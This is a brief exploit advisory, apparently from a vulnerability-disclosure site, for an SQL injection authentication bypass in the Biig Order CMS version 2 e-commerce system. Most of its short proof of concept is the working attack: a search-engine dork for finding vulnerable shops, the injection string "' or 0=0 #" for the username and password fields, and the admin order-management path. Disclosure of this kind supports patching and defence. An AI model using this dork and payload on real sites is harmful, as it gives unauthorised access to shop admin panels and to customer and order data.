Headline
Biig Order CMS 2 SQL Injection
Biig Order version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
================================================================================| # Title : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits) | | # Vendor : https://www.vaskar.in/ | | # Dork : "shop_detail.php?detail=" |================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : ' or 0=0 #[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================